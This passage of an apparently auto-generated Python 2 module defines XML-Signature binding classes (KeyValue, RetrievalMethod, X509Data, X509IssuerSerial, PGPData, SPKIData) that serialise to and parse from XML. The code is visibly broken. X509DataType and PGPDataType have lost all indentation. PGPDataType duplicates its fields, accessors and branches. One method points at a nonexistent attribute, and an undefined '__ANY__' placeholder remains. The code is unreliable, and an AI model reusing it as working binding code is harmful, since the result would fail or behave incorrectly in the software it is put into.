            self.anytypeobjs_ is not None or
            self.valueOf_
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='ds:', name_='KeyValueType', namespacedef_='', pretty_print=True):
        """Serialize this element and its mixed content as XML."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='KeyValueType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            # No content: collapse to a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='KeyValueType'):
        # KeyValueType declares no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespace_='ds:', name_='KeyValueType', fromsubclass_=False, pretty_print=True):
        """Write child elements and interleaved text in document order."""
        if not fromsubclass_:
            for item_ in self.content_:
                item_.export(outfile, level, item_.name, namespace_, pretty_print=pretty_print)
    def exportLiteral(self, outfile, level, name_='KeyValueType'):
        """Write this instance as a Python constructor-literal snippet."""
        level += 1
        already_processed = set()
        self.exportLiteralAttributes(outfile, level, already_processed, name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
        showIndent(outfile, level)
        outfile.write('valueOf_ = """%s""",\n' % (self.valueOf_,))
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        # KeyValueType declares no XML attributes.
        pass
    def exportLiteralChildren(self, outfile, level, name_):
        """Write the mixed-content list as a Python literal.

        Fixed: the generated code repeated the ``content_ = [...]`` block
        three times, producing duplicate ``content_`` keywords in the
        emitted literal; a single pass is sufficient.
        """
        showIndent(outfile, level)
        outfile.write('content_ = [\n')
        for item_ in self.content_:
            item_.exportLiteral(outfile, level, name_)
        showIndent(outfile, level)
        outfile.write('],\n')
    def build(self, node):
        """Populate this instance from an ElementTree/lxml element node."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        if node.text is not None:
            # Leading character data becomes the first mixed-content item.
            obj_ = self.mixedclass_(MixedContainer.CategoryText,
                MixedContainer.TypeNone, '', node.text)
            self.content_.append(obj_)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
    def buildAttributes(self, node, attrs, already_processed):
        # KeyValueType declares no XML attributes.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Convert one child element into mixed-content entries."""
        if nodeName_ == 'DSAKeyValue':
            obj_ = DSAKeyValue.factory()
            obj_.build(child_)
            obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
                MixedContainer.TypeNone, 'DSAKeyValue', obj_)
            self.content_.append(obj_)
            if hasattr(self, 'add_DSAKeyValue'):
                self.add_DSAKeyValue(obj_.value)
            elif hasattr(self, 'set_DSAKeyValue'):
                self.set_DSAKeyValue(obj_.value)
        elif nodeName_ == 'RSAKeyValue':
            obj_ = RSAKeyValue.factory()
            obj_.build(child_)
            obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
                MixedContainer.TypeNone, 'RSAKeyValue', obj_)
            self.content_.append(obj_)
            if hasattr(self, 'add_RSAKeyValue'):
                self.add_RSAKeyValue(obj_.value)
            elif hasattr(self, 'set_RSAKeyValue'):
                self.set_RSAKeyValue(obj_.value)
        elif nodeName_ == '':
            # NOTE(review): __ANY__ looks like a generator placeholder --
            # confirm it is defined at module level.
            obj_ = __ANY__.factory()
            obj_.build(child_)
            obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
                MixedContainer.TypeNone, '', obj_)
            self.content_.append(obj_)
            if hasattr(self, 'add_'):
                self.add_(obj_.value)
            elif hasattr(self, 'set_'):
                self.set_(obj_.value)
        if not fromsubclass_ and child_.tail is not None:
            obj_ = self.mixedclass_(MixedContainer.CategoryText,
                MixedContainer.TypeNone, '', child_.tail)
            self.content_.append(obj_)
class RetrievalMethodType(GeneratedsSuper):
    """Generated binding for the XML-DSig ``RetrievalMethodType`` type.

    Carries ``Type`` and ``URI`` XML attributes and an optional
    ``Transforms`` child element.
    """
    subclass = None
    superclass = None
    def __init__(self, Type=None, URI=None, Transforms=None):
        self.Type = _cast(None, Type)
        self.URI = _cast(None, URI)
        self.Transforms = Transforms
    def factory(*args_, **kwargs_):
        if RetrievalMethodType.subclass:
            return RetrievalMethodType.subclass(*args_, **kwargs_)
        else:
            return RetrievalMethodType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Generated accessor boilerplate.
    def get_Transforms(self): return self.Transforms
    def set_Transforms(self, Transforms): self.Transforms = Transforms
    def get_Type(self): return self.Type
    def set_Type(self, Type): self.Type = Type
    def get_URI(self): return self.URI
    def set_URI(self, URI): self.URI = URI
    def hasContent_(self):
        """Return True when there is any child content to serialize."""
        if (
            self.Transforms is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='ds:', name_='RetrievalMethodType', namespacedef_='', pretty_print=True):
        """Serialize this element (attributes plus children) as XML."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='RetrievalMethodType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            # No content: collapse to a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='RetrievalMethodType'):
        """Write the Type and URI XML attributes."""
        if self.Type is not None and 'Type' not in already_processed:
            already_processed.add('Type')
            outfile.write(' Type=%s' % (self.gds_format_string(quote_attrib(self.Type).encode(ExternalEncoding), input_name='Type'), ))
        if self.URI is not None and 'URI' not in already_processed:
            already_processed.add('URI')
            outfile.write(' URI=%s' % (self.gds_format_string(quote_attrib(self.URI).encode(ExternalEncoding), input_name='URI'), ))
    def exportChildren(self, outfile, level, namespace_='ds:', name_='RetrievalMethodType', fromsubclass_=False, pretty_print=True):
        """Export the optional Transforms child element."""
        # Fixed: removed an unused eol_ computation left in by the generator.
        if self.Transforms is not None:
            self.Transforms.export(outfile, level, namespace_, name_='Transforms', pretty_print=pretty_print)
    def exportLiteral(self, outfile, level, name_='RetrievalMethodType'):
        """Write this instance as a Python constructor-literal snippet."""
        level += 1
        already_processed = set()
        self.exportLiteralAttributes(outfile, level, already_processed, name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        """Write the Type and URI attributes as keyword argument literals."""
        if self.Type is not None and 'Type' not in already_processed:
            already_processed.add('Type')
            showIndent(outfile, level)
            outfile.write('Type="%s",\n' % (self.Type,))
        if self.URI is not None and 'URI' not in already_processed:
            already_processed.add('URI')
            showIndent(outfile, level)
            outfile.write('URI="%s",\n' % (self.URI,))
    def exportLiteralChildren(self, outfile, level, name_):
        """Write the Transforms child as a nested constructor literal."""
        if self.Transforms is not None:
            showIndent(outfile, level)
            outfile.write('Transforms=model_.Transforms(\n')
            self.Transforms.exportLiteral(outfile, level)
            showIndent(outfile, level)
            outfile.write('),\n')
    def build(self, node):
        """Populate this instance from an ElementTree/lxml element node."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
    def buildAttributes(self, node, attrs, already_processed):
        """Read the Type and URI attributes from the XML node."""
        value = find_attr_value_('Type', node)
        if value is not None and 'Type' not in already_processed:
            already_processed.add('Type')
            self.Type = value
        value = find_attr_value_('URI', node)
        if value is not None and 'URI' not in already_processed:
            already_processed.add('URI')
            self.URI = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Build the Transforms child from its XML element."""
        if nodeName_ == 'Transforms':
            obj_ = TransformsType.factory()
            obj_.build(child_)
            self.Transforms = obj_
class X509DataType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, X509IssuerSerial=None, X509SKI=None, X509SubjectName=None, X509Certificate=None, X509CRL=None, anytypeobjs_=None):
self.X509IssuerSerial = X509IssuerSerial
self.X509SKI = X509SKI
self.X509SubjectName = X509SubjectName
self.X509Certificate = X509Certificate
self.X509CRL = X509CRL
self.anytypeobjs_ = anytypeobjs_
def factory(*args_, **kwargs_):
if X509DataType.subclass:
return X509DataType.subclass(*args_, **kwargs_)
else:
return X509DataType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_X509IssuerSerial(self): return self.X509IssuerSerial
def set_X509IssuerSerial(self, X509IssuerSerial): self.X509IssuerSerial = X509IssuerSerial
def get_X509SKI(self): return self.X509SKI
def set_X509SKI(self, X509SKI): self.X509SKI = X509SKI
def get_X509SubjectName(self): return self.X509SubjectName
def set_X509SubjectName(self, X509SubjectName): self.X509SubjectName = X509SubjectName
def get_X509Certificate(self): return self.X509Certificate
def set_X509Certificate(self, X509Certificate): self.X509Certificate = X509Certificate
def get_X509CRL(self): return self.X509CRL
def set_X509CRL(self, X509CRL): self.X509CRL = X509CRL
def get_anytypeobjs_(self): return self.anytypeobjs_
def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
def hasContent_(self):
if (
self.X509IssuerSerial is not None or
self.X509SKI is not None or
self.X509SubjectName is not None or
self.X509Certificate is not None or
self.X509CRL is not None or
self.anytypeobjs_ is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ds:', name_='X509DataType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='X509DataType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='X509DataType'):
pass
def exportChildren(self, outfile, level, namespace_='ds:', name_='X509DataType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.X509IssuerSerial is not None:
self.X509IssuerSerial.export(outfile, level, namespace_, name_='X509IssuerSerial', pretty_print=pretty_print)
if self.X509SKI is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sX509SKI>%s</%sX509SKI>%s' % (namespace_, self.gds_format_base64(self.X509SKI, input_name='X509SKI'), namespace_, eol_))
if self.X509SubjectName is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sX509SubjectName>%s</%sX509SubjectName>%s' % (namespace_, self.gds_format_string(quote_xml(self.X509SubjectName).encode(ExternalEncoding), input_name='X509SubjectName'), namespace_, eol_))
if self.X509Certificate is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sX509Certificate>%s</%sX509Certificate>%s' % (namespace_, self.gds_format_base64(self.X509Certificate, input_name='X509Certificate'), namespace_, eol_))
if self.X509CRL is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sX509CRL>%s</%sX509CRL>%s' % (namespace_, self.gds_format_base64(self.X509CRL, input_name='X509CRL'), namespace_, eol_))
if self.anytypeobjs_ is not None:
self.anytypeobjs_.export(outfile, level, namespace_, pretty_print=pretty_print)
def exportLiteral(self, outfile, level, name_='X509DataType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
if self.X509IssuerSerial is not None:
showIndent(outfile, level)
outfile.write('X509IssuerSerial=model_.X509IssuerSerialType(\n')
self.X509IssuerSerial.exportLiteral(outfile, level, name_='X509IssuerSerial')
showIndent(outfile, level)
outfile.write('),\n')
if self.X509SKI is not None:
showIndent(outfile, level)
outfile.write('X509SKI=model_.base64Binary(\n')
self.X509SKI.exportLiteral(outfile, level, name_='X509SKI')
showIndent(outfile, level)
outfile.write('),\n')
if self.X509SubjectName is not None:
showIndent(outfile, level)
outfile.write('X509SubjectName=%s,\n' % quote_python(self.X509SubjectName).encode(ExternalEncoding))
if self.X509Certificate is not None:
showIndent(outfile, level)
outfile.write('X509Certificate=model_.base64Binary(\n')
self.X509Certificate.exportLiteral(outfile, level, name_='X509Certificate')
showIndent(outfile, level)
outfile.write('),\n')
if self.X509CRL is not None:
showIndent(outfile, level)
outfile.write('X509CRL=model_.base64Binary(\n')
self.X509CRL.exportLiteral(outfile, level, name_='X509CRL')
showIndent(outfile, level)
outfile.write('),\n')
if self.anytypeobjs_ is not None:
showIndent(outfile, level)
outfile.write('anytypeobjs_=model_.anytypeobjs_(\n')
self.anytypeobjs_.exportLiteral(outfile, level)
showIndent(outfile, level)
outfile.write('),\n')
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Parse one child element of ds:X509Data into the matching member.

        base64-valued children (X509SKI, X509Certificate, X509CRL) are decoded
        and validated; unrecognized children fall through to gds_build_any.
        """
        if nodeName_ == 'X509IssuerSerial':
            obj_ = X509IssuerSerialType.factory()
            obj_.build(child_)
            self.X509IssuerSerial = obj_
        elif nodeName_ == 'X509SKI':
            sval_ = child_.text
            if sval_ is not None:
                try:
                    bval_ = base64.b64decode(sval_)
                except (TypeError, ValueError), exp:
                    raise_parse_error(child_, 'requires base64 encoded string: %s' % exp)
                bval_ = self.gds_validate_base64(bval_, node, 'X509SKI')
            else:
                # Empty element: member stays None rather than empty bytes.
                bval_ = None
            self.X509SKI = bval_
        elif nodeName_ == 'X509SubjectName':
            X509SubjectName_ = child_.text
            X509SubjectName_ = self.gds_validate_string(X509SubjectName_, node, 'X509SubjectName')
            self.X509SubjectName = X509SubjectName_
        elif nodeName_ == 'X509Certificate':
            sval_ = child_.text
            if sval_ is not None:
                try:
                    bval_ = base64.b64decode(sval_)
                except (TypeError, ValueError), exp:
                    raise_parse_error(child_, 'requires base64 encoded string: %s' % exp)
                bval_ = self.gds_validate_base64(bval_, node, 'X509Certificate')
            else:
                bval_ = None
            self.X509Certificate = bval_
        elif nodeName_ == 'X509CRL':
            sval_ = child_.text
            if sval_ is not None:
                try:
                    bval_ = base64.b64decode(sval_)
                except (TypeError, ValueError), exp:
                    raise_parse_error(child_, 'requires base64 encoded string: %s' % exp)
                bval_ = self.gds_validate_base64(bval_, node, 'X509CRL')
            else:
                bval_ = None
            self.X509CRL = bval_
        else:
            # Wildcard (xs:any) content from other namespaces.
            obj_ = self.gds_build_any(child_, 'X509DataType')
            if obj_ is not None:
                self.set_anytypeobjs_(obj_)
# end class X509DataType
class X509IssuerSerialType(GeneratedsSuper):
    """Generated binding for the XML-Signature ds:X509IssuerSerial element.

    Members:
      X509IssuerName   -- issuer distinguished name (string).
      X509SerialNumber -- certificate serial number (integer).
    """
    subclass = None
    superclass = None
    def __init__(self, X509IssuerName=None, X509SerialNumber=None):
        self.X509IssuerName = X509IssuerName
        self.X509SerialNumber = X509SerialNumber
    def factory(*args_, **kwargs_):
        # Construct via a registered subclass when one has been installed.
        if X509IssuerSerialType.subclass:
            return X509IssuerSerialType.subclass(*args_, **kwargs_)
        else:
            return X509IssuerSerialType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_X509IssuerName(self): return self.X509IssuerName
    def set_X509IssuerName(self, X509IssuerName): self.X509IssuerName = X509IssuerName
    def get_X509SerialNumber(self): return self.X509SerialNumber
    def set_X509SerialNumber(self, X509SerialNumber): self.X509SerialNumber = X509SerialNumber
    def hasContent_(self):
        # True when at least one child element would be serialized.
        if (
            self.X509IssuerName is not None or
            self.X509SerialNumber is not None
            ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='ds:', name_='X509IssuerSerialType', namespacedef_='', pretty_print=True):
        """Serialize this element (and its children) as XML to *outfile*."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='X509IssuerSerialType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            # No children: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='X509IssuerSerialType'):
        # X509IssuerSerialType carries no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespace_='ds:', name_='X509IssuerSerialType', fromsubclass_=False, pretty_print=True):
        """Write the issuer-name and serial-number child elements."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.X509IssuerName is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<%sX509IssuerName>%s</%sX509IssuerName>%s' % (namespace_, self.gds_format_string(quote_xml(self.X509IssuerName).encode(ExternalEncoding), input_name='X509IssuerName'), namespace_, eol_))
        if self.X509SerialNumber is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<%sX509SerialNumber>%s</%sX509SerialNumber>%s' % (namespace_, self.gds_format_integer(self.X509SerialNumber, input_name='X509SerialNumber'), namespace_, eol_))
    def exportLiteral(self, outfile, level, name_='X509IssuerSerialType'):
        """Write this instance as Python constructor-literal text."""
        level += 1
        already_processed = set()
        self.exportLiteralAttributes(outfile, level, already_processed, name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        # No attributes to write.
        pass
    def exportLiteralChildren(self, outfile, level, name_):
        if self.X509IssuerName is not None:
            showIndent(outfile, level)
            outfile.write('X509IssuerName=%s,\n' % quote_python(self.X509IssuerName).encode(ExternalEncoding))
        if self.X509SerialNumber is not None:
            showIndent(outfile, level)
            outfile.write('X509SerialNumber=%d,\n' % self.X509SerialNumber)
    def build(self, node):
        """Populate this instance from an ElementTree/lxml element *node*."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
    def buildAttributes(self, node, attrs, already_processed):
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Parse one child element into the matching member."""
        if nodeName_ == 'X509IssuerName':
            X509IssuerName_ = child_.text
            X509IssuerName_ = self.gds_validate_string(X509IssuerName_, node, 'X509IssuerName')
            self.X509IssuerName = X509IssuerName_
        elif nodeName_ == 'X509SerialNumber':
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError), exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            ival_ = self.gds_validate_integer(ival_, node, 'X509SerialNumber')
            self.X509SerialNumber = ival_
# end class X509IssuerSerialType
class PGPDataType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, PGPKeyID=None, PGPKeyPacket=None, anytypeobjs_=None):
self.PGPKeyID = PGPKeyID
self.PGPKeyPacket = PGPKeyPacket
if anytypeobjs_ is None:
self.anytypeobjs_ = []
else:
self.anytypeobjs_ = anytypeobjs_
self.PGPKeyPacket = PGPKeyPacket
if anytypeobjs_ is None:
self.anytypeobjs_ = []
else:
self.anytypeobjs_ = anytypeobjs_
def factory(*args_, **kwargs_):
if PGPDataType.subclass:
return PGPDataType.subclass(*args_, **kwargs_)
else:
return PGPDataType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_PGPKeyID(self): return self.PGPKeyID
def set_PGPKeyID(self, PGPKeyID): self.PGPKeyID = PGPKeyID
def get_PGPKeyPacket(self): return self.PGPKeyPacket
def set_PGPKeyPacket(self, PGPKeyPacket): self.PGPKeyPacket = PGPKeyPacket
def get_anytypeobjs_(self): return self.anytypeobjs_
def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
def add_anytypeobjs_(self, value): self.anytypeobjs_.append(value)
def insert_anytypeobjs_(self, index, value): self._anytypeobjs_[index] = value
def get_PGPKeyPacket(self): return self.PGPKeyPacket
def set_PGPKeyPacket(self, PGPKeyPacket): self.PGPKeyPacket = PGPKeyPacket
def get_anytypeobjs_(self): return self.anytypeobjs_
def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
def add_anytypeobjs_(self, value): self.anytypeobjs_.append(value)
def insert_anytypeobjs_(self, index, value): self._anytypeobjs_[index] = value
def hasContent_(self):
if (
self.PGPKeyID is not None or
self.PGPKeyPacket is not None or
self.anytypeobjs_ or
self.PGPKeyPacket is not None or
self.anytypeobjs_
):
return True
else:
return False
def export(self, outfile, level, namespace_='ds:', name_='PGPDataType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='PGPDataType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='PGPDataType'):
pass
def exportChildren(self, outfile, level, namespace_='ds:', name_='PGPDataType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.PGPKeyID is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sPGPKeyID>%s</%sPGPKeyID>%s' % (namespace_, self.gds_format_base64(self.PGPKeyID, input_name='PGPKeyID'), namespace_, eol_))
if self.PGPKeyPacket is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sPGPKeyPacket>%s</%sPGPKeyPacket>%s' % (namespace_, self.gds_format_base64(self.PGPKeyPacket, input_name='PGPKeyPacket'), namespace_, eol_))
if self.PGPKeyPacket is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sPGPKeyPacket>%s</%sPGPKeyPacket>%s' % (namespace_, self.gds_format_base64(self.PGPKeyPacket, input_name='PGPKeyPacket'), namespace_, eol_))
for obj_ in self.anytypeobjs_:
obj_.export(outfile, level, namespace_, pretty_print=pretty_print)
def exportLiteral(self, outfile, level, name_='PGPDataType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
if self.PGPKeyID is not None:
showIndent(outfile, level)
outfile.write('PGPKeyID=model_.base64Binary(\n')
self.PGPKeyID.exportLiteral(outfile, level, name_='PGPKeyID')
showIndent(outfile, level)
outfile.write('),\n')
if self.PGPKeyPacket is not None:
showIndent(outfile, level)
outfile.write('PGPKeyPacket=model_.base64Binary(\n')
self.PGPKeyPacket.exportLiteral(outfile, level, name_='PGPKeyPacket')
showIndent(outfile, level)
outfile.write('),\n')
showIndent(outfile, level)
outfile.write('anytypeobjs_=[\n')
level += 1
for anytypeobjs_ in self.anytypeobjs_:
anytypeobjs_.exportLiteral(outfile, level)
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
if self.PGPKeyPacket is not None:
showIndent(outfile, level)
outfile.write('PGPKeyPacket=model_.base64Binary(\n')
self.PGPKeyPacket.exportLiteral(outfile, level, name_='PGPKeyPacket')
showIndent(outfile, level)
outfile.write('),\n')
showIndent(outfile, level)
outfile.write('anytypeobjs_=[\n')
level += 1
for anytypeobjs_ in self.anytypeobjs_:
anytypeobjs_.exportLiteral(outfile, level)
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'PGPKeyID':
sval_ = child_.text
if sval_ is not None:
try:
bval_ = base64.b64decode(sval_)
except (TypeError, ValueError), exp:
raise_parse_error(child_, 'requires base64 encoded string: %s' % exp)
bval_ = self.gds_validate_base64(bval_, node, 'PGPKeyID')
else:
bval_ = None
self.PGPKeyID = bval_
elif nodeName_ == 'PGPKeyPacket':
sval_ = child_.text
if sval_ is not None:
try:
bval_ = base64.b64decode(sval_)
except (TypeError, ValueError), exp:
raise_parse_error(child_, 'requires base64 encoded string: %s' % exp)
bval_ = self.gds_validate_base64(bval_, node, 'PGPKeyPacket')
else:
bval_ = None
self.PGPKeyPacket = bval_
elif nodeName_ == 'PGPKeyPacket':
sval_ = child_.text
if sval_ is not None:
try:
bval_ = base64.b64decode(sval_)
except (TypeError, ValueError), exp:
raise_parse_error(child_, 'requires base64 encoded string: %s' % exp)
bval_ = self.gds_validate_base64(bval_, node, 'PGPKeyPacket')
else:
bval_ = None
self.PGPKeyPacket = bval_
else:
obj_ = self.gds_build_any(child_, 'PGPDataType')
if obj_ is not None:
self.add_anytypeobjs_(obj_)
# end class PGPDataType
class SPKIDataType(GeneratedsSuper):
    """Generated binding for the XML-Signature ds:SPKIData element.

    Members:
      SPKISexp      -- base64-binary SPKI S-expression.
      anytypeobjs_  -- single wildcard extension element (or None).
    """
    subclass = None
    superclass = None
    def __init__(self, SPKISexp=None, anytypeobjs_=None):
        self.SPKISexp = SPKISexp
        self.anytypeobjs_ = anytypeobjs_
    def factory(*args_, **kwargs_):
        # Construct via a registered subclass when one has been installed.
        if SPKIDataType.subclass:
            return SPKIDataType.subclass(*args_, **kwargs_)
        else:
            return SPKIDataType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_SPKISexp(self): return self.SPKISexp
    def set_SPKISexp(self, SPKISexp): self.SPKISexp = SPKISexp
    def get_anytypeobjs_(self): return self.anytypeobjs_
    def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
    def hasContent_(self):
        # True when at least one child element would be serialized.
        if (
            self.SPKISexp is not None or
            self.anytypeobjs_ is not None
            ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='ds:', name_='SPKIDataType', namespacedef_='', pretty_print=True):
        """Serialize this element (and its children) as XML to *outfile*."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='SPKIDataType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            # No children: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='SPKIDataType'):
        # SPKIDataType carries no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespace_='ds:', name_='SPKIDataType', fromsubclass_=False, pretty_print=True):
        """Write the SPKISexp element plus any wildcard child."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.SPKISexp is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<%sSPKISexp>%s</%sSPKISexp>%s' % (namespace_, self.gds_format_base64(self.SPKISexp, input_name='SPKISexp'), namespace_, eol_))
        if self.anytypeobjs_ is not None:
            self.anytypeobjs_.export(outfile, level, namespace_, pretty_print=pretty_print)
    def exportLiteral(self, outfile, level, name_='SPKIDataType'):
        """Write this instance as Python constructor-literal text."""
        level += 1
        already_processed = set()
        self.exportLiteralAttributes(outfile, level, already_processed, name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        # No attributes to write.
        pass
    def exportLiteralChildren(self, outfile, level, name_):
        if self.SPKISexp is not None:
            showIndent(outfile, level)
            outfile.write('SPKISexp=model_.base64Binary(\n')
            self.SPKISexp.exportLiteral(outfile, level, name_='SPKISexp')
            showIndent(outfile, level)
            outfile.write('),\n')
        if self.anytypeobjs_ is not None:
            showIndent(outfile, level)
            outfile.write('anytypeobjs_=model_.anytypeobjs_(\n')
            self.anytypeobjs_.exportLiteral(outfile, level)
            showIndent(outfile, level)
            outfile.write('),\n')
    def build(self, node):
        """Populate this instance from an ElementTree/lxml element *node*."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
